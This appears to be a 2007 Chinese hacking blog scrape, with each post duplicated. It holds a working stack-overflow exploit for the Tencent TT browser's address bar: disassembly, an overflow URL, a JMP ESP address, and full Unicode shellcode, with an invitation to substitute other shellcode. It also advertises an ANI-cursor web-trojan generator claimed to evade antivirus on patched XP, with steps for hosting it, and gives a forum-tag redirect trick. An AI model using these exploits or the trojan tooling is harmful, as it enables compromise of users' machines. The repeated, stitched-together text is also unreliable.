0053AE85 |> 8B1D 2C825600 MOV EBX,DWORD PTR DS:[] ; msvcrt.wcscpy
0053AE8B |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
0053AE8F |. 55 PUSH EBP ; /src指向URL的堆地址
0053AE90 |. 50 PUSH EAX ; |dest指向栈帧中的一个栈地址
0053AE91 |. FFD3 CALL EBX ; wcscpy 复制URL到栈中
0053AE93 |. 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
0053AE97 |. 51 PUSH ECX
0053AE98 |. FFD6 CALL ESI
通过上面的分析,可以看出程序仅判断了地址栏输入的URL的长度是否为0,但是没有对URL长度的上限进行判断。这是导致最后栈溢出的根本原因!
那么我们只要算好地址,正好淹没了函数的返回地址即可,并在返回地址后紧跟着我们编制好的支持unicode的shellcode,也就是说我们玩的是JMP ESP这种经典的栈溢出跳shellcode的方法!
漏洞利用
作为演示,这里仅利用这个漏洞来弹出一个对话框,shellcode作者是failwest。
"x68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8B"
"xF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68"
"x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49"
"x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95xFF"
"x57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20"
"x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4"
"x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4"
"x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2C"
"xBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53"
"x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50x53"
"xFFx57xFCx53xFFx57xF8";
写成unicode的形式如下:(每两个字节进行首字节与尾字节颠倒即可)
%u6A68%u380A%u681E%u8963%u4FD1%u3268%u9174%u8B0C%u8DF4%uF47E%uDB33%u04B7%uE32B%uBB66%u3233%u6853%u7375%u7265%u3354%u64D2%u5A8B%u8B30%u0C4B%u498B%u8B1C%u8B09%u0869%u3DAD%u0A6A%u1E38%u0575%uFF95%uF857%u6095%u458B%u8B3C%u054C%u0378%u8BCD%u2059%uDD03%uFF33%u8B47%uBB34%uF503%u0F99%u06BE%uC43A%u0874%uCAC1%u0307%u46D0%uF1EB%u543B%u1C24%uE475%u598B%u0324%u66DD%u3C8B%u8B7B%u1C59%uDD03%u2C03%u95BB%uAB5F%u6157%u6A3D%u380A%u751E%u33A9%u53DB%u7768%u7365%u6874%u6166%u6C69%uC48B%u5053%u5350%u57FF%u53FC%u57FF
从shellcode到unicode的转换,我已经写好了工具,运行一下那个程序,就可以把同目录下的sc.txt(不含“x”的shellcode字符文件)转换成unicode的形式,生成unicode.txt文件!
如要进行其他攻击,请先写好支持Unicode的shellcode,然后用我的工具,转换成unicode形式,并把unicode形式的 shellcode追加到上面的URL中蠀緑后即可。具体支持unicode 的shellcode的编写,请参考以下链接:
Unicode编码表:
http://www.wiki.cn/wiki/Unicode%E7%BC%96%E7%A0%81%E8%A1%A8/0000-0FFF
Unicode shellcode:
http://arhiva.elitesecurity.org/t80431-Unicode-shellcode
《Creating Arbitrary Shellcode In Unicode Expanded Strings》
http://www.nextgenss.com/papers/unicodebo.pdf
漏洞概述
腾讯TT(QQ Traveler)是一款多页面浏览器,具有亲切、友好的用户界面,提供多种皮肤供用户根据个人喜好使用,另外TT更是新增了多项人性化的特色功能,使上网冲浪变的更加轻松自如、省时省力。智能屏蔽一键开通, 最近浏览一键找回,多页面一键打开,浏览记录一键清除,多种皮肤随心变换,多线程高速旋风下载。
腾讯TT在处理地址栏输入的URL时,存在栈溢出漏洞。虽然其处理过程中对URL进行了Unicode编码,但是经过精心的构造,还是可以构造出可见的 Unicode字符串,来控制EIP指令寄存器,并构造支持Unicode的shellcode。这一点已经得到我们的证实!
漏洞分析
构造的URL如下:
http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffggggggggggggggggggggggggggg ... hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh蠀緑橨㠊栞襣俑㉨酴謌跴�ҷ�뭦㈳桓獵牥㍔擒媋謰ో䦋謜謉ࡩ㶭੪Ḹյユ悕䖋謼Ռ词⁙�S譇무ྙھ쐺ࡴ쫁̇䛐吻ᰤ�妋̤曝㲋譻᱙�Ⰳ閻ꭟ慗樽㠊甞㎩叛睨獥桴慦汩쒋偓卐埿叼埿
――――――――――――――――――――――――――――――――
其中蠀緑是7DD1 8800这个十六进制的unicode码,这个地址指向Window XP的shell32.dll中的某个JMP ESP指令的地址;
剩下的蓝色部分是一段支持unicode的shellcode,这段shellcode是failwest大侠所作,可以自动加载user32.dll动态链接库,并弹出对话框,显示“failwest”。
因此,如果把上面的url填入腾讯TT的地址栏,并执行了shellcode,即弹出了对话框,那么就可以说明这个漏洞的存在
因此可以证明这个漏洞的存在,下面我们用ollyDBG来跟踪分析一下:
0053AE1D |. 8B35 30825600 MOV ESI,DWORD PTR DS:[] ; msvcrt.wcslen
0053AE23 |. 55 PUSH EBP ; /s 指向URL的堆地址
0053AE24 |. FFD6 CALL ESI ; wcslen 进行长度URL的计算
0053AE26 |. 83C4 04 ADD ESP,4
0053AE29 |. 85C0 TEST EAX,EAX ;EAX此时是URL的长度
0053AE2B |. 0F84 3B010000 JE TTravele.0053AF6C ;如果URL的长度为0,则退出
0053AE31 |. 68 D0CA5A00 PUSH TTravele.005ACAD0 ; /wstr2 = "about:blank"
0053AE36 |. 55 PUSH EBP ; |wstr1
0053AE37 |. FF15 38825600 CALL DWORD PTR DS:[] ; \_wcsicmp 让URL与"about:blank"比较
0053AE3D |. 83C4 08 ADD ESP,8
0053AE40 |. 85C0 TEST EAX,EAX ;如果URL和"about:blank"相同
0053AE42 |. 0F84 24010000 JE TTravele.0053AF6C ;就退出
0053AE48 |. A1 E4125C00 MOV EAX,DWORD PTR DS:[5C12E4]
0053AE4D |. 33DB XOR EBX,EBX
0053AE4F |. 85C0 TEST EAX,EAX
0053AE51 |. 76 32 JBE SHORT TTravele.0053AE85 ;跳0053AE85
0053AE53 |. BF 00705B00 MOV EDI,TTravele.005B7000
0053AE58 |> 55 /PUSH EBP ; /wstr2
0053AE59 |. 57 |PUSH EDI ; |wstr1
0053AE5A |. FF15 38825600 |CALL DWORD PTR DS:[] ; \_wcsicmp
0053AE60 |. 83C4 08 |ADD ESP,8
0053AE63 |. 85C0 |TEST EAX,EAX
0053AE65 |. 74 12 |JE SHORT TTravele.0053AE79
0053AE67 |. A1 E4125C00 |MOV EAX,DWORD PTR DS:[5C12E4]
0053AE6C |. 43 |INC EBX
0053AE6D |. 81C7 4A100000 |ADD EDI,104A
0053AE73 |. 3BD8 |CMP EBX,EAX
0053AE75 |.^72 E1 JB SHORT TTravele.0053AE58
0053AE77 |. EB 0C JMP SHORT TTravele.0053AE85
0053AE79 |> 3B1D E4125C00 CMP EBX,DWORD PTR DS:[5C12E4]
0053AE7F |. 0F82 E7000000 JB TTravele.0053AF6C
0053AE85 |> 8B1D 2C825600 MOV EBX,DWORD PTR DS:[] ; msvcrt.wcscpy
0053AE8B |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
0053AE8F |. 55 PUSH EBP ; /src指向URL的堆地址
0053AE90 |. 50 PUSH EAX ; |dest指向栈帧中的一个栈地址
0053AE91 |. FFD3 CALL EBX ; wcscpy 复制URL到栈中
0053AE93 |. 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
0053AE97 |. 51 PUSH ECX
0053AE98 |. FFD6 CALL ESI
通过上面的分析,可以看出程序仅判断了地址栏输入的URL的长度是否为0,但是没有对URL长度的上限进行判断。这是导致最后栈溢出的根本原因!
那么我们只要算好地址,正好淹没了函数的返回地址即可,并在返回地址后紧跟着我们编制好的支持unicode的shellcode,也就是说我们玩的是JMP ESP这种经典的栈溢出跳shellcode的方法!
漏洞利用
作为演示,这里仅利用这个漏洞来弹出一个对话框,shellcode作者是failwest。
"x68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8B"
"xF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68"
"x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49"
"x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95xFF"
"x57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20"
"x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4"
"x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4"
"x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2C"
"xBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53"
"x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50x53"
"xFFx57xFCx53xFFx57xF8";
写成unicode的形式如下:(每两个字节进行首字节与尾字节颠倒即可)
%u6A68%u380A%u681E%u8963%u4FD1%u3268%u9174%u8B0C%u8DF4%uF47E%uDB33%u04B7%uE32B%uBB66%u3233%u6853%u7375%u7265%u3354%u64D2%u5A8B%u8B30%u0C4B%u498B%u8B1C%u8B09%u0869%u3DAD%u0A6A%u1E38%u0575%uFF95%uF857%u6095%u458B%u8B3C%u054C%u0378%u8BCD%u2059%uDD03%uFF33%u8B47%uBB34%uF503%u0F99%u06BE%uC43A%u0874%uCAC1%u0307%u46D0%uF1EB%u543B%u1C24%uE475%u598B%u0324%u66DD%u3C8B%u8B7B%u1C59%uDD03%u2C03%u95BB%uAB5F%u6157%u6A3D%u380A%u751E%u33A9%u53DB%u7768%u7365%u6874%u6166%u6C69%uC48B%u5053%u5350%u57FF%u53FC%u57FF
从shellcode到unicode的转换,我已经写好了工具,运行一下那个程序,就可以把同目录下的sc.txt(不含“x”的shellcode字符文件)转换成unicode的形式,生成unicode.txt文件!
如要进行其他攻击,请先写好支持Unicode的shellcode,然后用我的工具,转换成unicode形式,并把unicode形式的 shellcode追加到上面的URL中蠀緑后即可。具体支持unicode 的shellcode的编写,请参考以下链接:
Unicode编码表:
http://www.wiki.cn/wiki/Unicode%E7%BC%96%E7%A0%81%E8%A1%A8/0000-0FFF
Unicode shellcode:
http://arhiva.elitesecurity.org/t80431-Unicode-shellcode
《Creating Arbitrary Shellcode In Unicode Expanded Strings》
http://www.nextgenss.com/papers/unicodebo.pdf
2007最新IE 0day T4nk重新火炮网马生成器1.0
作者:天晴无名氏 日期:2007-03-31 14:27
Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution Vulnerability
Bugtraq ID: 23194
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2007-1765
Remote: Yes
Local: No
Published: Mar 29 2007 12:00AM
Updated: Mar 30 2007 10:23PM
Credit: McAfee AVERT is credited with the discovery of this issue.
Vulnerable: Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Vista December CTP
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business
Microsoft Windows Vista beta 2
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Vista 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Mail 0
Microsoft Windows 2000 Server Japanese Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server
+ Avaya S8100 Media Servers
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Outlook Express 6.0 SP2
Microsoft Outlook Express 6.0 SP1
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP Home SP1
+ Microsoft Windows XP Professional SP1
Microsoft Outlook Express 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Media Center Edition
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Tablet PC Edition
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Citrix ICA Client for Windows 4.0 SP6a
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
Microsoft Windows动画光标畸形ANI头结构远程栈溢出漏洞
发布日期:2007-03-29
更新日期:2007-03-30
受影响系统:
Microsoft Windows XPSP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
Microsoft Security Advisory (935423)
Vulnerability in Windows Animated Cursor Handling
临时解决方法:
* 以纯文本格式读取邮件
* 禁用预览栏
* 配置Windows资源管理器使用Windows传统风格的文件夹:
打开Windows资源管理器
在“工具”菜单中选择“文件夹”选项
在“任务”部分选择“使用Windows传统风格的文件夹”
参考:
Microsoft Windows animated cursor ANI header stack buffer overflow
Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution Vulnerability
Exploit Download
联系作者:xs_soft@qq.com
最新漏洞的IE网页木马生成器
功能如下:
已测试过windows Xp sp2全补丁
几乎所有xp系统通杀
免杀 不卡 不弹窗 不关窗
使用最新的漏洞
使用说明:
两个地址都要填 其它最重要的就是那张图片木马
tk.htm就是调用那只图片木马
然后
把生成后的tk.htm和2..jpg
把2.jpg改成你的图片马址.jpg分别传上你的空间
或自己写htm调用图片木马
配合本身自写的加密器一般就比较爽了
另外网马免杀加密器不发 不要跟我要
图示如下:
Exploit Download
点我下载
文章来自
Bugtraq ID: 23194
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2007-1765
Remote: Yes
Local: No
Published: Mar 29 2007 12:00AM
Updated: Mar 30 2007 10:23PM
Credit: McAfee AVERT is credited with the discovery of this issue.
Vulnerable: Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Vista December CTP
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business
Microsoft Windows Vista beta 2
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Vista 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Mail 0
Microsoft Windows 2000 Server Japanese Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server
+ Avaya S8100 Media Servers
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Outlook Express 6.0 SP2
Microsoft Outlook Express 6.0 SP1
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP Home SP1
+ Microsoft Windows XP Professional SP1
Microsoft Outlook Express 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Media Center Edition
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Tablet PC Edition
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Citrix ICA Client for Windows 4.0 SP6a
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft Internet Explorer 7.0
+ Microsoft Windows Vista Ultimate
+ Microsoft Windows Vista Home Premium
+ Microsoft Windows Vista Home Basic
+ Microsoft Windows Vista Enterprise
+ Microsoft Windows Vista Business
+ Microsoft Windows Vista 0
+ Microsoft Windows Vista 0
Microsoft Windows动画光标畸形ANI头结构远程栈溢出漏洞
发布日期:2007-03-29
更新日期:2007-03-30
受影响系统:
Microsoft Windows XPSP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
Microsoft Security Advisory (935423)
Vulnerability in Windows Animated Cursor Handling
临时解决方法:
* 以纯文本格式读取邮件
* 禁用预览栏
* 配置Windows资源管理器使用Windows传统风格的文件夹:
打开Windows资源管理器
在“工具”菜单中选择“文件夹”选项
在“任务”部分选择“使用Windows传统风格的文件夹”
参考:
Microsoft Windows animated cursor ANI header stack buffer overflow
Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution Vulnerability
Exploit Download
联系作者:xs_soft@qq.com
最新漏洞的IE网页木马生成器
功能如下:
已测试过windows Xp sp2全补丁
几乎所有xp系统通杀
免杀 不卡 不弹窗 不关窗
使用最新的漏洞
使用说明:
两个地址都要填 其它最重要的就是那张图片木马
tk.htm就是调用那只图片木马
然后
把生成后的tk.htm和2..jpg
把2.jpg改成你的图片马址.jpg分别传上你的空间
或自己写htm调用图片木马
配合本身自写的加密器一般就比较爽了
另外网马免杀加密器不发 不要跟我要
图示如下:
Exploit Download
点我下载
文章来自
通杀所有论坛最新漏洞
作者:天晴无名氏 日期:2007-03-28 17:03
<< >>
代码如下:
http://www.mmbest.com/qq.swf?url=http://你要打开的网页地址
在发帖时,以插入多媒体标签方式(如flash,mp3,mp,wmv,rm等)调用上述代码,可实现打开帖子直接跳转到你想要的网址,如果某个多媒体标签无效,可换另一个重试,目前各大论坛基本未对此做出防范。
code]演示2:[mp3]http://www.mmbest.com/qq.swf?url=http://www.sohu.com[/mp3][/code]
请各论坛管理员及时去掉多媒体标签的使用,以免给论坛造成严重损失.
文章转自木马帝国论坛
代码如下:
http://www.mmbest.com/qq.swf?url=http://你要打开的网页地址
在发帖时,以插入多媒体标签方式(如flash,mp3,mp,wmv,rm等)调用上述代码,可实现打开帖子直接跳转到你想要的网址,如果某个多媒体标签无效,可换另一个重试,目前各大论坛基本未对此做出防范。
code]演示2:[mp3]http://www.mmbest.com/qq.swf?url=http://www.sohu.com[/mp3][/code]
